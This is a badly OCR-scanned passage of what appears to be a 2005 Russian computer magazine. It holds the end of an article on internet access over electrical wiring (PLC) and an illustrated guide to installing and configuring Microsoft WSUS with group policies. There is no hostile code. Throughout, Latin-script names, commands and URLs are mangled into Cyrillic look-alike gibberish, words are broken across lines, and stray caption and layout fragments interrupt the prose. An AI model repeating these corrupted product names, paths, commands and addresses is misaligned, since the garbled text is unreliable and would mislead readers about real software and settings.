к появлению многократной интерференции прямого и задержанного 
сигналов или, как это еще называют, отражений. В итоге, на приемник 
одновременно приходит несколько одинаковых сигналов, сдвинутых на 
определенную величину, в зависимости от расстояния, пройденного 
каждым из них. Получается, что вместо одного отправленного бита, на 
принимающей стороне может оказаться два или три, которые каким-то 
образом нужно отфильтровать, а после — правильно интерпретиро- 
вать. Для того чтобы решить эту задачу, было решено использовать 
микросекундную задержку между передачей пакетов, а также дополни- 
тельные типы модуляции ЭВРЗК 
(ЭіІІегепІіаІ Віпагу РНазе ЗИіІІ 
Кеуіпд, дифференциальная двоич- 
ная фазовая манипуляция) и раз- 
новидности ЭОР5К (ЭіІІегепІіаІ 
Оиасігаіиге РПазе ЗИіТі Кеуіпд, 
квадратурная дифференциальная 
фазовая манипуляция). 

[еіНегпеі ѵв. РІ_С] По сути, тех- 
нологии ЕІНегпеІ и РІ_С очень похо- 
жи. Разница заключается лишь в 
способе подключения к Сети ко- 
нечного абонента. Не надо думать, 
что достаточно установить какой- 
то хитрый девайс на электростан- 
ции — и весь город сразу получит доступ в Интернету через розетку. На 
самом деле все намного сложнее: инъекторы сигнала, которые переда- 
ют данные в электрическую сеть, чаще всего устанавливаются в каждом 
доме и даже подъезде, при этом непосредственно до здания Интернет 
доводится вполне привычными средствами, например, оптоволокном. 
Фактически, сеть на основе РІ_С — это большая локалка. С той лишь 
разницей, что вместо свитчей и витой пары используется электрическая 
проводка, а клиенты вместо сетевых карт используют специальные 
адаптеры, которые вставляются в розетку. Есть, правда, несколько дру- 
гой способ доставки сигнала до здания, когда специальное оборудова- 
ние устанавливается на местной подстанции и передает данные из оп- 
товолоконной сети в силовой кабель. С помощью силового кабеля и на- 
бора повторителей, установленных через каждые полкилометра, кабель 
доводят до каждого дома, и уже там с помощью специальных девайсов 
в распределительных щитках сигнал инъектируется в низковольтовую 
(120-220 В) сеть. Однако этот вариант мало распространен в мире и уж 
тем более не нашел применения в России. 

Вообще, инфраструктура сети — это не единственное сходство техноло- 
гий. Например, на уровне ОЗІ стандарт Нотеріид 1.0 так же, как и 
ЕІІіегпеІ, поддерживает так называемое качество обслуживания (ОоЗ, 




ЭРЗ-процессор — это всего 
лишь небольшая микросхема, но 
без нее о РІ_С нам пришлось бы 
только мечтать 



Оиаіііу оі Зегѵісе). А для разрешения конфликтных ситуаций «столкнове- 
ния» трафика (не забывай, что данные от каждого абонента передаются 
по одним и тем же проводам) была реализована специальная система 
приоритетов. Пакеты, которые имеют наивысшую важность (голос, видео 
и т.д.), для которых особенно критична минимизация задержек, помеча- 
ются специальным флагом Тітіпд СгШсаІ и имеют самый высокий приори- 
тет, поэтому обрабатываются РЮ-маршрутизаторами в первую очередь. 

[реальные примеры] В теории все вроде бы вполне реально, но 
как дела обстоят на практике? Если верить пресс-релизам, то во всем 
мире применение широкополосного доступа в Интернет через обыч- 
ную электросеть идет полным ходом. Например, электроэнергетичес- 
кая компания ЗсоКізІі-НусІго-ЕІесІпсз запустила проект по разверты- 
ванию сети РІ_С еще пару лет назад. Таким образом, удалось предос- 
тавить доступ в инет тем людям, которые живут в сельской местности 
и из-за слаборазвитой телекоммуникационной сети лишь мечтают о 
высокоскоростном доступе в Интернет. Примечательно, что использо- 
вание Интернета через розетку оказалось существенно дешевле, чем 
аналогичная по скорости ОЗЬлиния. Фишка на основе РІ_С вовсю ис- 
пользуются и на территории Германии, причем Интернет — это даже 
не самое основное применение технологии. В некоторых городах лю- 




прежде чем сигнал доходит до модема, он серьезно искажается. Именно 
поэтому было так важно использовать технологии восстановления поте- 
рянных во время передачи данных 



дям даже не обязательно отправлять квитанцию об оплате за элект- 
роэнергию, так как вся информация со счетчиков автоматически отп- 
равляется ее поставщику. 

Что касается России, то испытания РІ_С по традиции впервые нача- 
лись в столице. Компания «Мосэнерго» провела ряд испытаний по 
созданию технологической сети, объединяющей свои диспетчерские 
пункты с питающими, распределительными и трансформаторными 
подстанциями. Во время тестирования использовалось оборудова- 
ние от различных производителей и, что удивительно, все заработа- 
ло как надо :). К сожалению, своими глазами я не видел, но очевид- 
цы утверждают, что им удалось обеспечить доступ в Интернет на ско- 
ростях 2 — 12 Мбит/с, что более чем достаточно для домашнего ис- 
пользования. К сожалению, никаких пресс-релизов или даже наме- 
ков по поводу того, когда эту технологию «Мосэнерго» начнет ис- 
пользовать в коммерческих целях в Москве, пока не сообщается. 
Зато в конце 2004 года фонды Іпіеі Сарііаі и «Русские технологии» 

объявили о своих планах инвес- 
тировать сразу 4 миллиона дол- 
ларов в компанию «Электро- 
Ком». И свое слово выполнили. 
Сейчас «Электро-Ком» активно 
занимается строительством пи- 
лотной сети РІ_С на территории 
Москвы, Рязани, Калуги, Росто- 
ва-на-Дону и некоторых других 
городов России. В Калуге, к при- 
меру, уже весь центр города пе- 
ретянут оптоволокном, а в некоторых частях даже установлено все 
необходимое оборудование и начинается предоставление бесплат- 
ного тестового доступа. Скорость достигает 9 Мбит/с на прием и 6 
Мбит/с на отдачу, даже там, где проводка уже несколько раз горела 
и была отремонтирована на «авось». По заявлению специалистов 
«Электро-Ком» максимальную планку удастся поднять в несколько 
раз за счет использования дополнительной инъекции сигнала. Более 
того, уже сейчас обсуждаются планы по поводу предоставления 
ѴоІР-телефонии с использованием РІ_С о 




обыкновенная розетка. Вставил 
адаптер — работай в инете! 













За ОДИН час 





С °осі 



оборот минутном стрелки 

300 000 к м/с * 3600 с 
40 000 км 




300 000 
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038 

Подарок 
для админа 

СБЫЛАСЬ МЕЧТА! МЕЧТА АДМИНИСТРАТОРА 
ПЕТИ, КОТОРОМУ ДОВЕЛОСЬ ОБСЛУЖИВАТЬ 
ОГРОМНУЮ КОРПОРАТИВНУЮ СЕТЬ, СОСТОЯ- 
ЩУЮ ИЗ ПАРКА САМЫХ РАЗНООБРАЗНЫХ МА- 
ШИН. КАЖДЫЙ ЗНАЕТ, НАСКОЛЬКО СЛОЖНО 
ЗАСТАВИТЬ ПОЛЬЗОВАТЕЛЕЙ СВОЕВРЕМЕННО 
УСТАНАВЛИВАТЬ НА СВОИ КОМПЬЮТЕРЫ ОБ- 
НОВЛЕНИЯ И ЗАПЛАТКИ. ОЧЕНЬ ЧАСТО ЭТУ 
ЖУТКО МУТОРНУЮ, НУДНУЮ И СОВЕРШЕННО 
НЕ ИНТЕРЕСНУЮ РАБОТУ (НЕ БЕРЕМ В РАСЧЕТ 
ОБСЛУЖИВАНИЕ КОМПЬЮТЕРА СИМПАТИЧ- 
НОЙ СЕКРЕТАРШИ) ПРИХОДИТСЯ ВЫПОЛНЯТЬ 
САМОМУ. ВЕРНЕЕ СКАЗАТЬ — ПРИХОДИЛОСЬ, 
ТАК КАК ТЕПЕРЬ ЭТО МОЖНО ДЕЛАТЬ АВТО- 
МАТИЧЕСКИ! I ЗГіасІОЗ (зГіасІоз @геа1.хакер.ш) 



Все о ѴѴЗЫЗ — 
серверной службе 
обновления ѴѴіпсІоѵѵз 




[автоматические апдейты: быть или не 
быть?] Установив ѴѴіпсІоѵѵз на домашней машине, 
я чуть ли не первым делом отключаю автоматиче- 
ские обновления (ѴѴіпсІоѵѵз Іірбаіе Зузіет). Эта, не- 
сомненно, полезная служба, к сожалению, неверо- 
ятно прожорлива. Она не подозревает, что боль- 
шинство обновлений уже давно приютились на мо- 
ем винте и ждут своей установки, а поэтому с за- 
видной упорностью начинает ломиться в инет и вы- 
качивать все доступные апдейты. В принципе, ни- 
чего смертельного в этом нет — разве что, посмо- 
трев на статистику потраченного трафика, ты в 
очередной раз вспомнишь дядю Билла. Установка 
всех необходимых Зегѵісе Раск'ов и обновлений 
вручную занимает порядка 10 — 15 минут, но для 
корпоративной сети это явно не вариант. Ни один 
админ в трезвом уме не станет вручную устанавли- 
вать апдейты на каждую машину, сомнительно и 
то, что с этой задачей справятся обычные пользо- 
ватели. Получается, что без службы автоматиче- 
ского обновления никак не обойтись. С другой сто- 
роны, представь, что будет, если ѴѴіпсІоѵѵз Іірбаіе 
Зузіет будет активной на каждом компьютере вну- 
три крупной (от 1 00 рабочих станций) корпоратив- 
ной сети? Несложно догадаться, что один и тот же 
апдейт будет закачиваться по несколько десятков, 
сот и даже тысяч раз. А ведь обновления, в том чи- 
сле и критические, для того или иного софта выхо- 
дят чуть ли не каждую неделю. . . На практике полу- 
чаем колоссальные расходы на трафик, которые 
легко можно было бы избежать в случае существо- 
вания некого кэширующего элемента, который бы 
единожды выкачивал всю базу обновлений и уже 
потом раздавал всем рабочим станциям локальной 
сети. Имя этого элемента — ѴѴЗІІЗ (ѴѴіпсІоѵѵз Зег- 
ѵег Іірбаіе Зегѵісе) — серверная служба обновле- 
ния ѴѴіпсІоѵѵз, которая была зарелизена Місго- 
зой'ом всего несколько месяцев назад. 



[знакомимся ближе] Итак, для чего конкретно 
нужен этот ѴѴЗІІЗ? По сути, это инструмент для 
эффективного распространения обновлений 
для таких продуктов МісгозоК, как ѴѴіпсІоѵѵз ХР 
РгоІеззіопаІ, ѴѴіпсІоѵѵз 2000, ѴѴіпсІоѵѵз 2000 Зег- 
ѵег, СШісе ХР, СШісе 2003, ЗОІ_ Зегѵег 2000, 

МЗЭЕ, ЕхсГіапде Зегѵег и ЕхсГіапде Зегѵег 
2003. В скором этот и без того немаленький список значительно расши- 
рится, о чем свидетельствуют многочисленные пресс-релизы МісгозоК. 
Система работает по схеме клиент-сервер. Сервер распространяет ап- 
дейты и заплатки, клиент их забирает. И если клиентская часть по умол- 
чанию встроена в ѴѴіпсІоѵѵз 2000 (начиная с ЗРЗ), ѴѴіпсІоѵѵз ХР и ѴѴіпсІоѵѵз 
2003 Зегѵег и называется ѴѴіпсІоѵѵз Іірсіаіез, то серверную компоненту, то 
есть ѴѴЗІІЗ, необходимо установить на компьютере с ѴѴіпсІоѵѵз 2000 Зег- 
ѵег (с Зегѵісе Раск 4) или ѴѴіпсІоѵѵз Зегѵег 2003. После установки, о кото- 
рой мы подробно поговорим ниже, ѴѴЗІІЗ представляет собой мощный 
инструмент администратора, которым можно удаленно управлять с помо- 
щью специального ѴѴеЬ-интерфейса, доступного из любой ѴѴіпсІоѵѵз-си- 
стемы с установленным Іпіегпеі Ехріогег 6.0 и выше. К сожалению, доступ 
из другого браузера или операционной системы не поддерживается. 

Для крупных сетей или нескольких связанных между собой сетей может 






это просто логотип 
ѴѴіпсІоѵѵз Зегѵег 
Зузіет :) 



ПОВОД ДЛЯ РАЗМЫШЛЕНИЯ 

В сентябре МісгозоК заявила, что не будет выпускать обно- 
вление на критическую уязвимость в ѴѴіпсІоѵѵз, несмотря 
данные ранее обещания. Бреши присвоена высшая сте- 
пень опасности — «критическая», то есть ее потенциально 
можно использовать для массового взлома машин. Разра- 
ботанный патч оказался корявым, поэтому его выход был 
отложен на неопределенный срок. А ведь такие бажные 
апдейты могут попасть и на ѴѴіпсІоѵѵз Іірсіаіе, поэтому пе- 
ред установкой обновления во всю сеть рекомендуется 
протестировать его на нескольких машинах. К слову, в ав- 
густе вышли целых 6 патчей МісгозоГС, один из которых 
закрывал еще одну критическую уязвимость ѴѴіпсІоѵѵз. 








быть полезной поддержка цепочек 
ѴѴЗІІЗ-серверов. Один их них — 
главный — подключен к интернету 
(точнее — к сервису МісгозоГС ІІрба- 
Іе) и на регулярной основе закачи- 
вает оттуда все доступные обно- 
вления. Другие ѴѴЗІІЗ-серверы, как 
правило, не имеют прямого доступа 
в Интернет, но зато используют 
главный ѴѴЗІІЗ в качестве источни- 
ка апдейтов. Такую иерархию реко- 
мендуется использовать в крупных 
сетях, чтобы разгрузить основные 
магистрали локального трафика. В 
принципе, между используемыми 
ѴѴЗІІЗ-серверами может даже и не 
быть подключения! Все апдейты, 
доступные на главном сервере, 
можно, к примеру, записать на бол- 
ванку и с ее помощью перенести на 
остальные ѴѴЗІІЗ. Такая фенька 
может быть полезной, если ты об- 
служиваешь несколько локалок, 
между которыми нет высокоско- 
ростного подключения. 

Подключаясь к ѴѴЗІІЗ-серверу, 
клиент передает информацию об 
установленных апдейтах. Сервер 

пробивает эти данные по своей базе данных и отдает ему все актуаль- 
ные апдейты. Обновление баз ѴѴЗІІЗ может также осуществляться на ре- 
гулярной основе, благо этот процесс имеет довольно много параметров. 
В случае необходимости может быть обновлена и сама служба автома- 
тических обновлений, причем как клиентская, так и серверная части. Это 
произойдет, если на сервере будет доступны их новые версии. 

Вся информация об обновлениях централизовано хранится в базе дан- 
ных. В качестве рабочей площадки может быть использована как мощ- 
ная МісгозоК ЗОІ_ Зегѵег, так и более легкая и бесплатная М3 30І_ Зег- 
ѵег Эезкіор Епдіпе (сокращенно МЗЭЕ). 




Предшественником техно- 
логии 1/1/5(75 является 5(75 
(Зоіітге ІІрбаіе Зегѵісез), 
о которой можно почитать 
на сайте ѵѵѵѵѵѵ.тісго- 
зоб.сот/ПизЮезкІорОерІо- 
утепі/зесигііу/зиз.тзрх. 
Однако новая система нам- 
ного более функциональна 
и удобна в использовании. 

шшш.тісгозоП.сош/шіп- 
бо тзегѵегзузіет/ирбаіез- 
егѵісез — официальный 
сайт 1/1/5(75 
шшшшизѵѵікі.сот — 
огромное количество ин- 
формации по 1/1/5(75 от 
опытных админов. 

Информацию о технологии 
Асііѵе йігесіогу и подроб- 
ный мануал по ее настрой- 
ки ищи в #2 и #5 номерах 
X. Без базовых знаний сер- 
верных версий ѴѴіпбошз 
сегодня не обойтись. 



Более того, в состав ѴѴЗІІЗ включена МісгозоГС ѴѴіпсІоѵѵз Зегѵег Безкіор Еп- 
діпе (МЗѴѴЭЕ), которой, правда, можно воспользоваться только под ѴѴіп- 
сІоѵѵз 2003 Зегѵег. В базе данных хранятся полный перечень и описание до- 
ступных обновлений, конфиги ѴѴЗІІЗ, информация о состоянии обновле- 
ний клиентских компьютеров, а также многочисленные отчеты о работе. 

[установка ѴѴЗІІЗ] Чтобы до конца осознать всю гибкость технологии 
ѴѴЗІІЗ, предлагаю посмотреть ее в действии — пристегнись, мы присту- 
паем к установке. В первую очередь необходимо подготовить подходя- 
щую платформу. Как уже было сказано, ѴѴЗІІЗ можно установить толь- 
ко на серверной ѴѴіпсІоѵѵз 2000 и ѴѴіпсІоѵѵз 2003, за исключением ее 64- 
битных и ѴѴеЬ ЕсШіоп версий. Для обслуживания средней локальной се- 
ти, состоящий из 500 машин, инженеры МісгозоК рекомендуют исполь- 
зовать сервер, имеющий на борту 1 ГГц процессор и 1 Гб оперативки. 
Потребуется, как минимум, 1 Гб дискового пространства для самой 
ѴѴЗІІЗ (при всем том, что дистрибутив весит всего 130 Мб), а также 6 Гб 
для хранения данных (апдейтов, заплаток и т.д.). Помимо этого, предъя- 
вляются требования по установленному в системе программному обес- 
печению. Так для установки и дальнейшей работы ѴѴЗІІЗ потребуется: 

1) МісгозоК Іпіегпеі Іпіогтаііоп Зегѵісез (N3) 6.0, который, скорее всего, 
был установлен вместе с самой виндой. 

2) МісгозоК .ЫЕТ Ргатеѵѵогк 1.1 Зегѵісе Раск 1 Іог ѴѴіпсІоѵѵз Зегѵег 2003. 

3) ВаскдгоипсІ ІпіеІІідепІ Тгапзіег Зегѵісе (ВІТЗ) 2.0. 

Поскольку ѴѴЗІІЗ активно использует базу данных, то этот список мож- 
но было бы дополнить еще и СУБД. Но как уже было сказано, в дистри- 
бутив ѴѴЗІІЗ включена бесплатная ѴѴМЗЭЕ, которая вполне успешно 
справляется со всеми возложенными на нее задачами. Правда, для ее 
установки потребуется еще, как минимум, 2 Гб на винте. Все перечи- 
сленное, а заодно и дистрибутив ѴѴЗІІЗ можно найти на наших дисках 
или же закачать с официального сайта ѴѴЗІІЗ — ѵѵѵѵѵѵ.тісгозоіі.сот/ѵѵіп- 
сіо ѵѵззегѵегзузіет/ирсіаіезегѵісез/сіо ѵѵпіоасіз . 

Устанавливать ѴѴЗІІЗ уполномочены только члены локальной группы 
— Администраторы — это еще одно важное требования для установ- 
ки. Поэтому перед тем, как приступить к установке, необходимо зай- 
ти в систему под администраторским аккаунтом. Ниже я рассмотрю 
довольно простой, однако, самый распространенный и эффективный 
способ установки и использования ѴѴЗІІЗ. Работа ѴѴЗІІЗ и встроен- 
ной СУБД ѴѴМЗЭЕ будет осуществляться под управлением ѴѴіпсІоѵѵз 
2003 Зегѵег с установленным 133, а все обновления, заплатки и софт 
будут локально храниться на сервере. 

Дистрибутив сервера распространяется в виде одного единственного ис- 
полняемого файла — ѴѴЗІІЗЗеІир.ехе. Запустив его, ты увидишь удоб- 
ный мастер установки, который будет руководить процессом первичной 
установки сервиса. После традиционного принятия лицензионного согла- 
шения, мастер предложит тебе указать место, в котором ѴѴЗІІЗ будет 
хранить обновления. В принципе, ты можешь этот путь не указывать (для 
этого достаточно убрать единственную галку в этом окне), однако апдей- 
ты в этом случае будут выкачиваться из Сети каждый раз по запросу 
пользователя. Это не только увеличит количество интернет-трафика, но 




в крупной корпоративной сети 
можно организовать целую ие- 
рархию из ѴѴЗІІЗ-серверов 




хранение обновлений на локаль- 
ном диске — залог успеха! 




если между ѴѴЗІІЗ-серверами от- 
сутствует прямое соединение, все 
обновления и патчи можно пере- 
нести на болванку или другой но- 
ситель 




в состав ѴѴЗІІЗ входит полноцен- 
ная и при этом бесплатная СУБД - 
ЗОІ_ Зеѵег ОезкЮр Епдіпе (ѴѴіп- 
сІоѵѵз), необходимая для его работы 



[ХАКЕР 10 [82] 05 > РС_20ЫЕ 039 ] 











[хакер 10 [82] 05 > РС_20ЫЕ 040 ] 




список свежих апдейтов 




главное окно ѴѴЗІІЗ-консоли 



и существенно снизит 
скорость обновления. 
Суди сам: апдейты из 
локалки закачались 
бы намного быстрее, 
нежели из интернета. 
На следующем шагу ма- 
стер предложит обозна- 
чалъ параметры исполь- 
зуемой СУБД. По умол- 
чанию будет устанавли- 
ваться встроенная ѴѴМ- 
ЗБЕ, но это легко можно 
измені/пъ. Если на серве- 
ре уже установлена ка- 
кая-то СУБД (к примеру, 
М3 3(Х), ты можешь ис- 
пользовать именно ее, 
выбрав соответствую- 
щий пункт в специаль- 
ном выпадающем меню. 
Как подобает любой 
добротной админской 
софтине, ѴѴЗІІЗ под- 
держивает управление 
через ѴѴЕВ-интерфейс. 



Все обновления и патчи также передаются по протоколу НТТР (хотя и скры- 
то для пользователя), поэтому для ее работы крайне необходим 133. Если 
ты его не использовал, то есть порт 80 свободен, то никаких проблем воз- 
никнуть не должно: просто оставляй все настройки по умолчанию и жми 
«Далее». Если же у тебя уже есть рабочий ѴѴЕВ-сайт, то сервисы ѴѴЗІІЗ бу- 
дут установлены на порт 8530. В этом же окне ты увидишь 2 важных ІІВІ_: 
один из них указывает на сервис с апдейтами, другой — на администратор- 
ский интерфейс. Запомни их: они потребуются для дальнейшей настройки. 
В «Параметрах зеркального обновления» администратору предлагается 
обозначить роль устанавливаемого ѴѴЗІІЗ-сервера. Если это первый 
ѴѴЗІІЗ-сервер в сети, то этот этап можно пропустить. В противном слу- 
чае, необходимо указать сервер, стоящий выше по иерархии, то есть тот, 
с которого будут закачиваться обновления. После этого остается лишь 
несколько раз нажать «Далее» и ждать окончания первичной установки. 

[укрощаем ѴѴЗІІЗ] Итак, самый простой этап выполнен. Теперь необходимо 
отконфигурировать машины клиентов, а также сам ѴѴЗІІЗ, чтобы тот пра- 
вильно закачивал из инета и раздавал все необходимые обновления. Упра- 
вление сервисом осуществляется с помощью специальной консоли, кото- 
рая может быть вызвана через Пуск -» Все программы -» Администриро- 
вание -> МісгозоЙ ѴѴіпсІоѵѵз Зегѵег Іірсіаіе Зегѵісез. Помимо этого, получить 
доступ к консоли можно удаленно через браузер, обратившись по адресу 
Шр://8ЕН ѴЕНМА МЕ/ѴѴ8ІІ8А сітіп (он был отображен на экране во время 
установки). Для ее использования необходимо быть членом группы «Адми- 
нистраторы ѴѴЗІІЗ» или «Администраторы» на сервере ѴѴЗІІЗ. При этом 
адрес для доступа к консоли рекомендуется занести в интранет- зону, вос- 
пользовавшись соответствующими настройками Іпіегпеі Ехріогег'а (напом- 
ню, что любой другой браузер не подойдет). 

Консоль ѴѴЗІІЗ может сначала напугать обилием разнообразных разде- 
лов, но на самом деле ничего страшного в них нет. Начнем с настройки ти- 
пов обновляемых компонентов, так как каждый выбирает их, 
исходя из своих собственных потребностей. Для этого перехо- 
ди в «Параметры» «Параметры синхронизации». Синхро- 
низация — это процесс поиска и закачки новых обновлений 
на сервере МісгозоЙ, которые удовлетворяют заданным адми- 
нистратором критериям. Собственно, эти критерии и нужно 
определить. В появившемся окне изначально будет открыт 
раздел «Расписание». Синхронизацию можно проводить ли- 
бо вручную (нажатием на специальную кнопку), или же авто- 
матически. На время настройки и отладки системы рекомен- 
дую оставить первый вариант. Второй раздел — «Продукты и 
классы» — не менее важен, так как в нем задаются обновля- 
емые продукты и типы обновлений для них. Если щелкнешь 
по кнопке «Изменить» в левой части окна, то получишь спи- 
сок всех доступных для обновления программных продуктов. 

Отмечай галочками то, что тебя интересует (например, ѴѴіп- 
сіоѵѵз ХР, ѴѴіпбоѵѵз 2003 Зегѵег), и жми «ОК». Для того чтобы 
обозначить типы обновляемых модулей, необходимо нажать 
кнопку «Изменить» в другой части окна. По умолчанию ѴѴЗІІЗ 
загружает с МісгозоЙ'овского сервера лишь критические об- 
новления и обновления системы безопасности. По твоему же- 



ланию в их число могут попасть драйвера, накопительные пакеты обновле- 
ний, а также пакеты новых функций. 

Раздел «Прокси-сервер» необходим только в случае, использования в 
сети прокси-сервера, а все необходимые параметры раздела «Источник 
обновления» были обозначены во время установки ѴѴЗІІЗ. Намного 
больший интерес для нас представляет раздел «Файлы обновлений и 
языки». Напомню, что для каждой локализации своих продуктов Місго- 
зой выпускает разные апдейты и патчи, которые почему-то несовмести- 
мы между собой. Выкачивать абсолютно все совершенно не нужно, по- 
этому, нажав кнопку «Дополнительно», я обычно оставляю только ан- 
глийский и русский языки. Здесь же задаются несколько других опций, 
например, место хранение файлов обновлений. Оставь этот параметр 
как есть, так как уже во время установки мы указали, что все данные 
необходимо хранить на жестком диске. Важной также является опция 
«Загружать файлы обновлений на этот сервер, только если они одобре- 
ны». Одобрить обновление можно как в ручном (через соответствующий 
диалог ѴѴЗІІЗ консоли), так и автоматическом режиме, который на- 
страивается через раздел «Параметры» -» «Параметры автоматическо- 
го обновления». Активировав эту опцию, ты получишь возможность 
одобрять и закачивать некоторые специфические типы обновлений (на- 
пример, драйвера) в полуавтоматическом режиме, выбирая лишь то, 
что тебе действительно нужно. В тоже время обновления, для которых 
установлено автоматическое одобрение (например, критические за- 
платки), будут на автомате закачиваться без твоего ведома. 

Теперь, когда параметры синхронизации полностью установлены, мож- 
но наполнить наш ѴѴЗІІЗ-сервер апдейтами. Жми на кнопку «Синхрони- 
зировать сейчас» и жди завершения процесса. После соединения, 
ѴѴЗІІЗ попытается выяснить, есть ли на сервере новые обновления — 
они там обязательно окажутся, так как эта наша первая синхронизация. 
Если для некоторых типов апдейтов ты установил автоматическое одоб- 
рение, то сразу же начнется процесс их закачки. Все остальные обно- 
вления будут также закачены, но только после того, как администратор 
даст соответствующую команду. После окончания синхронизации в 
ѴѴЗІІЗ-консоле обязательно открой раздел «Обновления», и ты уви- 
дишь список всех доступных обновлений. 

[групповые политики] ѴѴЗІІЗ активно использует групповые политики и 
в зависимости от настроек той или иной группы соответствующим обра- 
зом обслуживает принадлежащего ей клиента. В документации к ѴѴЗІІЗ 
спецы из МісгозоЙ рекомендуют создать, как минимум, две группы: те- 
стовую и основную. Членам тестовой группы (желательно, чтобы это бы- 
ли опытные юзеры) доступны абсолютно все обновления, которые уста- 
навливаются на их машинах по мере появления. По сути, это подопыт- 
ные кролики — на них ты проверяешь стойкость вышедших обновлений. 
Если после установки ничего смертельного не произойдет, апдейты 
можно делать доступными для основной группы. Но если получится так, 
что МісгозоЙ допустит оплошность, выпустив глюкавый апдейт, то про- 
блемы коснуться только тестовой группы, а основная часть компьюте- 
ров по-прежнему будет работать «на ура». 

Процесс организации групп осуществляется в два этапа. Во-первых, 
нужно указать, каким образом компьютеры будут распределяться по 
группам. Здесь есть два варианта: либо ты вручную будешь добавлять 
каждый компьютер в группу посредствам ѴѴЗІІЗ-консоли (то есть со 
стороны сервера), либо же клиенты автоматически будут попадать в 
нужную группу на основе своих групповых политик или настроек рее- 
стра винды (то есть принадлежность к группе выбирается со стороны 




настройки автоматического обновления: пускай они будут выполняться в 3 ночи 
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закачивать обновления для всех продуктов 


если в сети используется несколько ѴѴЗІІЗ-серве- 




МісгозоГС — бессмысленная трата трафика. 


ров, необходимо настроить параметры отражения 




Выбери здесь только то, что тебе нужно 



клиента). Во-вторых, эти самые группы 
необходимо создать. В локальной сети сред- 
ней величины все компьютеры довольно легко 
рассортировать по группам вручную, поэтому 
этот способ используется по умолчанию. В 
этом легко убедиться, щелкнув по кнопке «Па- 
раметры» и выбрав «Параметры компьюте- 
ров». В появившемся окне должна быть актив- 
на настройка «Переместить компьютеры в 
ѴѴіпсІоѵѵз Зегѵег Іірбаіе Зегѵісез». 

Вообще, создание группы — это довольно про- 
стая задача. Кликни в верхнем меню по кнопке 
«Компьютеры», далее «Создать группу ком- 
пьютеров» и введи имя группы. Допустим, мы 
создаем тестовую группу (хотя это неважно), 
поэтому назовем ее ТезЬ Одна лишь проблема 
— добавлять в нее пока некого, так как листинг 
«Компьютеры» пока пуст. Это вполне логично, 
так как обычные компьютеры в сети пока не 
знают о существовании локального ѴѴЗІІЗ- 
сервера и, соответственно, не обращаются к 
нему. Это нужно исправить :) 

Способ конфигурирования службы автомати- 
ческих обновлений на рабочих станциях зави- 
сит от конфигурации сети. В среде Асііѵе Эігес- 
іогу (то есть локальной сети с развернутой 
службой каталогов) можно настроить все ком- 
пьютеры сразу, используя лишь объекты груп- 



СЛЕДИ ЗА ФАЙРВОЛОМ 

Любой грамотный админ между ло- 
кальной сетью и Интернетом устана- 
вливает файрвол. Во избежание про- 
блем нужно проследить, чтобы для 
установленной ѴѴЗІІЗ доступ в гло- 
бальную сеть не блокировался. Для 
закачки обновлений с МісгозоК ІІрба- 
Іе, ѴѴЗІІЗ-сервер использует 80 
(НТТР) и 443 (НТТРЗ) порты, причем 
эти параметры не могут быть измене- 
ны. Если ты считаешь, что открытие 
этих портов негативно повлияет на 
безопасность твоей системы, предла- 
гаю составить «белый список», со- 
стоящий из адресов, к которым будет 
разрешен доступ. В него нужно вне- 
сти: 

Ыір://ѵѵіпбо ѵѵзирба іе . тісгозоіі. сот 
іііір://* . ѵѵіпсіо ѵѵзирсіаіе . тісгозоіі. сот 
іі іірз://* . ѵѵіпбо ѵѵзирба іе . тісгозоіі. сот 
іііір://* . ирбаіе . тісгозоіі. сот 
Мірз://* . ирсіаіе . тісгозоіі. сот 
іііір://* .ѵѵіпбоѵѵзирбаіе. сот 
іііір ://бо ѵѵпіоаб. ѵѵіпбо ѵѵзирба іе . сот 
іііір:/ /боѵѵпіоаб. тісгозоіі. сот 
іііір ://* . боѵѵпіоаб. ѵѵіпбоѵѵзирбаіе . сот 
іііір://ѵѵизіаі. ѵѵіпбоѵѵз.сот 
іііір://пізегѵісераск.тісгозоіі.сот 



повой политики (Огоир Роіісу ОЬіеІсз, ОРО). 
При таком раскладе МісгозоК рекомендует соз- 
дать новый ОРО, содержащий исключительно 
настройки для работы с ѴѴЗІІЗ-сервером, по- 
сле чего прилинковать его к нужному контейне- 
ру (чаще всего — домену). Более подробно 
можно почитать здесь — Ыір://до. тісго- 
зоіі. сот/Шіпк/?ііпкЮ= 1 4232, Мір://до.тісго- 
зоіі.сот/Шіпк/?ипкЮ=41777 . Сейчас же мы 
рассмотрим вариант, когда Асііѵе Эігесіогу в 
сети не установлен и настройки на каждом кли- 
ентском компьютере необходимо указывать 
вручную с помощью локальной групповой по- 
литики. Для этого на клиентской машине нажи- 
май Пуск -» Выполнить -» дресШ.тзс. В появив- 
шемся окне открой узел Г рупповая политика и 
кликни правой кнопкой мыши по пункту «Адми- 
нистративные шаблоны». В контекстном меню 
выбери «Добавление и удаление шаблонов», 
далее «Добавить», файл ѵѵиаи.абт. Теперь, ра- 
скрыв узел «Компоненты ѴѴіпсІоѵѵз», ты уви- 
дишь пункт ѴѴіпсІоѵѵз Іірсіаіе — здесь-то и зада- 
ются настройки службы автоматических обно- 
влений. С помощью параметра «Настройка ав- 
томатического обновления» можно указать пе- 
риодичность обращения к ѴѴЗІІЗ-серверу, а 
также порядок загрузки и установки обновле- 
ний. В большинстве случаев подойдет вариант 
«Загружать автоматически и устанавливать». 
Следующий параметр — «Указать размещение 
службы обновлений МісгозоК в интрасети» — 
еще более важен, так как здесь задаются пара- 
метры ѴѴЗІІЗ-сервера. Для того чтобы вся си- 
стема заработала, в первом текстовом поле 
укажи іііір ://8ЕН ѴЕНМАМЕ, где ЗЕВѴЕВІМАМЕ 
— имя или ІР-адрес сервера ѴѴЗІІЗ. 

А теперь попробуем подключиться к серверу с 
апдейтами. Для этого совершенно необязатель- 
но ждать времени, на которое запланировано 
обновление. Выбери «Пуск» «Выполнить» и 
введи ѵѵиаисІЬехе /беіесіпоѵѵ. Если подключе- 
ние пройдет успешно, то имя этого компьютера 
отобразится в консоле ѴѴЗІІЗ на странице 
«Компьютеры». Тебе остается лишь добавить 
его в нужную группу и провернуть тот же фокус 
со всеми остальными компьютерами сети. 

[в заключение] По существу, большая часть ра- 
боты выполнена. Компьютеры сети подключа- 
ются к ѴѴЗІІЗ-серверу и закачивают необходи- 
мые обновления. Сам ѴѴЗІІЗ четко обрабаты- 
вает их запросы в соответствии с групповыми 
политиками, а также закачивает нужные ап- 
дейты с сервера ѴѴіпсІоѵѵз Іірсіаіе. Правда, син- 
хронизация с МісгозоК'овским сервером на 
время отладки нашей системы проходила в 
ручном режиме (по нажатию клавиши «Синхро- 
низировать сейчас»). Это не очень удобно, по- 
